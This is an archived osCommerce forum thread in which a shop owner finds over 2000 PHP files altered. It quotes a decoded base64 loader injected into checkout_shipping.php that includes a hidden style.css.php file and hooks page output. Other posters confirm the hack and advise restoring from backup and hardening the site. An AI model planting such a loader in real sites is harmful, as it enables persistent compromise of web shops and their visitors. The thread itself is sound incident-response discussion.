sandyj Posted May 5, 2011 Share Posted May 5, 2011 I am running 2.2 RC2 and using the Sitemonitor security software. Today I noticed that over 2000 .php files have been edited: small sample below: Difference found: New-> cookie_usage.php 3775 Original-> 6933<br>Difference found: New-> checkout_shipping.php 20916 Original-> 1830<br>Difference found: New-> thumbnails.fla 221696 Original-> 11223<br>Difference found: New-> checkout_confirmation.php 16137 Original-> 11125 I opened a few of these files, and mostly found nothing obvious.. but in checkout_shipping.php I found some base64 code. I decrypted it, and came up with this: if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/leatherb/public_html/admin/includes/languages/espanol/modules/newsletters/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} Is this a hacking attempt or could there be another explanation? The site seems to be working fine. thanks in advance, Sandy Link to comment Share on other sites More sharing options...
Taipo Posted May 5, 2011 Share Posted May 5, 2011 Attackers have been able to prepend malicious code to all the PHP files in your site, also check all the html files and .js files too. Pretty much means you need to reload your site from scratch froma backup or upgrade to 2.3.1 and start again sorry. There are a couple of links in my signature that are relevant to this type of attack if you want to read more on the subject. If you intend to reload from a backup, I wrote an addon called osC_Sec which will effectively patch the security issues in 2.2.1. Its probably best once the site is restored from a backup, that you install osC_Sec to prevent this from happening again. Restoring from a backup, remember to also check in the images directory and other directories for files that should not be there. There will be one or a number of added files on your site that attackers have used to launch this type of attack across all or almost all php files. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
sandyj Posted May 5, 2011 Author Share Posted May 5, 2011 Thanks Taipo. It's a never ending battle with these hackers! Link to comment Share on other sites More sharing options...
sucuri Posted May 6, 2011 Share Posted May 6, 2011 Yes, pretty much hacked. If you haven't deleted it already, can you please share the content of this file: /home/leatherb/public_html/admin/includes/languages/espanol/modules/newsletters/style.css.php ? I am just curious to what it is doing... (either post on paste bin or email me directly [email protected]). Thanks! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.